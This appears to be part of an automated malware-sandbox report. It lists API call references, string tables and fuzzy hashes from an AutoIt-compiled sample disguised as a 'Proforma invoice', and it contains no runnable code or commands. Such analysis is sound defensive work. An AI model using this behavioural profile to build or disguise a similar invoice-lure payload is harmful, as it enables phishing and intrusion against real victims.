                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4eb1a77e857704eb8317ded26f6d4ef54ff8e0ff63962f43b603ad1f6456298e
                                                                                                                    • Instruction ID: 93b466610b429f2c91811c75410da191dde12aa291ea9c5dbb994176c1c73cac
                                                                                                                    • Opcode Fuzzy Hash: 4eb1a77e857704eb8317ded26f6d4ef54ff8e0ff63962f43b603ad1f6456298e
                                                                                                                    • Instruction Fuzzy Hash: 23B11F20D6AF804DD323A6399875336B74CAFBB2C5F52D71BFC2678D62EB2190834241
                                                                                                                    APIs
                                                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002B4C4A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
• Opcode ID: 82edb523e1bfcb2d3479e584ed534804251ae08ebe12d508db2f176831548789
• Instruction ID: 6a1786fba65a6d0768f06120a555dca5d82cca83ddbef98e6919d5d2a3c8eed4
• Instruction Fuzzy Hash: 53D05E9117620A38EC5C2F20AE8FFFA0A08E300FCAFD8C18B76028A0C3ECE05C605035

APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002A8389), ref: 002A87D1
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: c3154eb5025181ffd8357e6ed18d04d79eb7b2920d6f94ebe49b0d21b7ae637e
• Instruction ID: 28aae296ab75f9c3c1be57ebc8185d81a69417abbcb9d3fd3790941d82762fc5
• Instruction Fuzzy Hash: 3DD05E3226050EABEF018EA4ED05EAE3B69EB04B01F408111FE16C61A1C775D935AB60

APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0027A12A
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 666793bc01bc300e0e8f2d42c25d927b36fc6c44582d057f1d7725a3a860d072
• Instruction ID: 4ef6534a693a9a4c3f29c7bfdc7719f7bacd8f4e3908aa18c591c863a901c23a
• Instruction Fuzzy Hash: 80A0123000010CA7CA401B45FC084447F5CD6001907004061FC0D40021873258104584

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c1475f8607be95c8b4752c0dc956db7c7df3fd7eb81f3565a2561ab6f2c4eecf
• Instruction ID: 338b124f629cdba813d0c4ce77739b905736068d992a28dffeec8ddb2051ceeb
• Instruction Fuzzy Hash: 33223530534567CBDF288EA4C49477EB7A1FB42304F28826BD9469B692DFB09DF1CA41

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction ID: 3953bc27570286a5226d7f51e1d3d90014c2e9e783b1de3cfd394cf03e9ca52a
• Instruction Fuzzy Hash: 89C1AA322250934ADF2D4A3D843503EFBA15EA27B131A875DD8BBDB1D5EE30C979D610

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction ID: 9211b47971c1bc0aca4c131b2eab3ce53786d22d5ed962d233e26a76a9cc1515
• Instruction Fuzzy Hash: E5C1A73222519349DF2D4A3EC43503EFAA15EA27B131A876DD4BBDB1D4EE30C938D620

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction ID: 744f060b5d4ed3caeed3cda1088847e79e1d5d6c952c6fa20cdb6c088123507c
• Instruction Fuzzy Hash: 49C1853222519309DF2D4A3DC47613EBAA15EA2BB131A975DD4BBDB1C4EE30C935DA10

APIs
• DeleteObject.GDI32(00000000), ref: 002C785B
• DeleteObject.GDI32(00000000), ref: 002C786D
• DestroyWindow.USER32 ref: 002C787B
• GetDesktopWindow.USER32 ref: 002C7895
• GetWindowRect.USER32(00000000), ref: 002C789C
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 002C79DD
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 002C79ED
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7A35
• GetClientRect.USER32(00000000,?), ref: 002C7A41
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002C7A7B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7A9D
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7AB0
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7ABB
• GlobalLock.KERNEL32(00000000), ref: 002C7AC4
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7AD3
• GlobalUnlock.KERNEL32(00000000), ref: 002C7ADC
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7AE3
• GlobalFree.KERNEL32(00000000), ref: 002C7AEE
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7B00
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,002E2CAC,00000000), ref: 002C7B16
• GlobalFree.KERNEL32(00000000), ref: 002C7B26
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 002C7B4C
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 002C7B6B
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7B8D
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7D7A
Strings
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 2211948467-2373415609
• Opcode ID: 9f429adfa10ac2e0acf17348a94245a5867909361c8b905ff68269850126e490
• Instruction ID: ed5e6ab468072b0857f21ef96420ffa6e8aa5b57a73784b29f0f3dd057110ce2
• Instruction Fuzzy Hash: EA028A71920115EFDB14DFA4DD89EAE7BB9EF48310F148259F916AB2A0CB30AD11CF64

APIs
• CharUpperBuffW.USER32(?,?,002DF910), ref: 002D3627
• IsWindowVisible.USER32(?), ref: 002D364B
Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                    • API String ID: 4105515805-45149045
                                                                                                                    • Opcode ID: 1e1c88620b8ee313c0e8b9c452ad6b2e5bf153951b3babc1fb25fd075eb9918d
                                                                                                                    • Instruction ID: 67805ccb1d6c6de3697fc92158d419e6b133559b42a7f68062d8b833a6d6f9aa
                                                                                                                    • Opcode Fuzzy Hash: 1e1c88620b8ee313c0e8b9c452ad6b2e5bf153951b3babc1fb25fd075eb9918d
                                                                                                                    • Instruction Fuzzy Hash: AAD19F30234301DBCB04EF10C466A6E77A5AF55754F14845AF8865B3E2CB71DE6ACF46
APIs
• SetTextColor.GDI32(?,00000000), ref: 002DA630
• GetSysColorBrush.USER32(0000000F), ref: 002DA661
• GetSysColor.USER32(0000000F), ref: 002DA66D
• SetBkColor.GDI32(?,000000FF), ref: 002DA687
• SelectObject.GDI32(?,00000000), ref: 002DA696
• InflateRect.USER32(?,000000FF,000000FF), ref: 002DA6C1
• GetSysColor.USER32(00000010), ref: 002DA6C9
• CreateSolidBrush.GDI32(00000000), ref: 002DA6D0
• FrameRect.USER32(?,?,00000000), ref: 002DA6DF
• DeleteObject.GDI32(00000000), ref: 002DA6E6
• InflateRect.USER32(?,000000FE,000000FE), ref: 002DA731
• FillRect.USER32(?,?,00000000), ref: 002DA763
• GetWindowLongW.USER32(?,000000F0), ref: 002DA78E
  • Part of subcall function 002DA8CA: GetSysColor.USER32(00000012), ref: 002DA903
  • Part of subcall function 002DA8CA: SetTextColor.GDI32(?,?), ref: 002DA907
  • Part of subcall function 002DA8CA: GetSysColorBrush.USER32(0000000F), ref: 002DA91D
  • Part of subcall function 002DA8CA: GetSysColor.USER32(0000000F), ref: 002DA928
  • Part of subcall function 002DA8CA: GetSysColor.USER32(00000011), ref: 002DA945
  • Part of subcall function 002DA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002DA953
  • Part of subcall function 002DA8CA: SelectObject.GDI32(?,00000000), ref: 002DA964
  • Part of subcall function 002DA8CA: SetBkColor.GDI32(?,00000000), ref: 002DA96D
  • Part of subcall function 002DA8CA: SelectObject.GDI32(?,?), ref: 002DA97A
  • Part of subcall function 002DA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 002DA999
  • Part of subcall function 002DA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002DA9B0
  • Part of subcall function 002DA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 002DA9C5
  • Part of subcall function 002DA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002DA9ED
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
• String ID:
• API String ID: 3521893082-0
• Opcode ID: e1765603805aae49f496ae2f1993bc5ed515123438a6468bdf0736ec1af56084
• Instruction ID: 61face4d5d7ce4121d35d366bd72d65739a60ac5defc2cf0b87f593646640684
• Opcode Fuzzy Hash: e1765603805aae49f496ae2f1993bc5ed515123438a6468bdf0736ec1af56084
• Instruction Fuzzy Hash: 5F91AE72809301EFD7509F64ED0CE5BBBA9FB88321F144A2AF9A2961A0D770DD44CB56
APIs
• DestroyWindow.USER32(?,?,?), ref: 00252CA2
• DeleteObject.GDI32(00000000), ref: 00252CE8
• DeleteObject.GDI32(00000000), ref: 00252CF3
• DestroyIcon.USER32(00000000,?,?,?), ref: 00252CFE
• DestroyWindow.USER32(00000000,?,?,?), ref: 00252D09
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0028C43B
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0028C474
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0028C89D
  • Part of subcall function 00251B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00252036,?,00000000,?,?,?,?,002516CB,00000000,?), ref: 00251B9A
• SendMessageW.USER32(?,00001053), ref: 0028C8DA
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0028C8F1
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0028C907
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0028C912
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
• String ID: 0
• API String ID: 464785882-4108050209
• Opcode ID: c242bffe38a1c5c3f36794229f67042679e8d786ec6a9f618404752b5d809c54
• Instruction ID: ebda1d4d354c488811d2c17919f666adfaa9fda1383fe0040badda4400c8fac1
• Opcode Fuzzy Hash: c242bffe38a1c5c3f36794229f67042679e8d786ec6a9f618404752b5d809c54
• Instruction Fuzzy Hash: 4812C034521202DFDB11DF24C888B69B7E5FF45302F64416AE856DB6A2C731EC69CFA4
APIs
• DestroyWindow.USER32(00000000), ref: 002C74DE
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002C759D
• SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 002C75DB
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 002C75ED
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 002C7633
• GetClientRect.USER32(00000000,?), ref: 002C763F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 002C7683
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002C7692
• GetStockObject.GDI32(00000011), ref: 002C76A2
• SelectObject.GDI32(00000000,00000000), ref: 002C76A6
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 002C76B6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 002C76BF
• DeleteDC.GDI32(00000000), ref: 002C76C8
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002C76F4
• SendMessageW.USER32(00000030,00000000,00000001), ref: 002C770B
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 002C7746
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 002C775A
• SendMessageW.USER32(00000404,00000001,00000000), ref: 002C776B
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 002C779B
• GetStockObject.GDI32(00000011), ref: 002C77A6
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002C77B1
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 002C77BB
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Opcode ID: 9c08ddbf9105c8058b0192e1e0ffd6992f06f902025bb11f2ef9fa021098902a
• Instruction ID: 12df6ca57fc863ee08750bd613c75d1ad11997fceaa9114c7996f4293797bed1
• Opcode Fuzzy Hash: 9c08ddbf9105c8058b0192e1e0ffd6992f06f902025bb11f2ef9fa021098902a
• Instruction Fuzzy Hash: EEA19D71A10615FFEB10DBA4DD4AFAEBBA9EB48710F008215FA15A72E0C770AD11CF64
APIs
• SetErrorMode.KERNEL32(00000001), ref: 002BAD1E
• GetDriveTypeW.KERNEL32(?,002DFAC0,?,\\.\,002DF910), ref: 002BADFB
• SetErrorMode.KERNEL32(00000000,002DFAC0,?,\\.\,002DF910), ref: 002BAF59
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: 5c9481c8ffd84b0e04a4078ff463f9fe635480ff204a9c97b8b8fc0677206dda
• Instruction ID: edc7689b18a49d86f7cd628ba1cc8f430127864ab9cbce9cf9b914c8436375b3
• Opcode Fuzzy Hash: 5c9481c8ffd84b0e04a4078ff463f9fe635480ff204a9c97b8b8fc0677206dda
• Instruction Fuzzy Hash: F751B5B0675306DBCB01DF14C962CFD73A0EB087817244066F887A7AD1CA729D65DB96
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
• Opcode ID: 578593d18259362c92708d0a17927803b0574718e745ba1e919f579563044966
• Instruction ID: 629e8706de003dc01948c8c634ee9b3119db3184fc5907d0812bc4a68cef3837
• Opcode Fuzzy Hash: 578593d18259362c92708d0a17927803b0574718e745ba1e919f579563044966
• Instruction Fuzzy Hash: 3B8136B0671206AADF20BE60DC46FBB7768AF15701F444025FC056B1D2EB70DE79DAA8
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 002D9AD2
                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 002D9B8B
                                                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 002D9BA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2326795674-4108050209
                                                                                                                    • Opcode ID: e002e39e470b65877d2eafd977ed7935c623743cd7bc7fd5b001d1a37159dd46
                                                                                                                    • Instruction ID: abcc64aa75186a53e64df0cd74c121f5c5dae48da3f3c262ee848487fc83fb77
                                                                                                                    • Opcode Fuzzy Hash: e002e39e470b65877d2eafd977ed7935c623743cd7bc7fd5b001d1a37159dd46
                                                                                                                    • Instruction Fuzzy Hash: F302CE31225202AFD725CF14C848BAABBE5FF49314F04852FF999963A1C774DDA4CB92
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000012), ref: 002DA903
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 002DA907
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 002DA91D
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 002DA928
                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 002DA92D
                                                                                                                    • GetSysColor.USER32(00000011), ref: 002DA945
                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 002DA953
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 002DA964
                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 002DA96D
                                                                                                                    • SelectObject.GDI32(?,?), ref: 002DA97A
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 002DA999
                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002DA9B0
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 002DA9C5
                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002DA9ED
                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 002DAA14
                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 002DAA32
                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 002DAA3D
                                                                                                                    • GetSysColor.USER32(00000011), ref: 002DAA4B
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 002DAA53
                                                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 002DAA67
                                                                                                                    • SelectObject.GDI32(?,002DA5FA), ref: 002DAA7E
                                                                                                                    • DeleteObject.GDI32(?), ref: 002DAA89
                                                                                                                    • SelectObject.GDI32(?,?), ref: 002DAA8F
                                                                                                                    • DeleteObject.GDI32(?), ref: 002DAA94
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 002DAA9A
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 002DAAA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1996641542-0
                                                                                                                    • Opcode ID: cc50db550116fb242b4a16e68c33c8048166fc4a9fcac8357adf8030d819cbd4
                                                                                                                    • Instruction ID: 89429239170d5c2f248fbfb9c8cfe1eae23cff1f8f3d75e6c725f46cdc74606d
                                                                                                                    • Opcode Fuzzy Hash: cc50db550116fb242b4a16e68c33c8048166fc4a9fcac8357adf8030d819cbd4
                                                                                                                    • Instruction Fuzzy Hash: 75515F71D01209EFDB109FA4ED48E9E7BB9EB08320F158226F916AB2A1D7719D50CF94
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002D8AC1
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D8AD2
                                                                                                                    • CharNextW.USER32(0000014E), ref: 002D8B01
                                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002D8B42
                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002D8B58
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D8B69
                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002D8B86
                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 002D8BD8
                                                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 002D8BEE
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 002D8C1F
                                                                                                                    • _memset.LIBCMT ref: 002D8C44
                                                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002D8C8D
                                                                                                                    • _memset.LIBCMT ref: 002D8CEC
                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002D8D16
                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 002D8D6E
                                                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 002D8E1B
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 002D8E3D
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002D8E87
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002D8EB4
                                                                                                                    • DrawMenuBar.USER32(?), ref: 002D8EC3
                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 002D8EEB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1073566785-4108050209
                                                                                                                    • Opcode ID: c2520726b30b25d1fac03354630cfe3159d68069255b47ef77f660a8b65f49f7
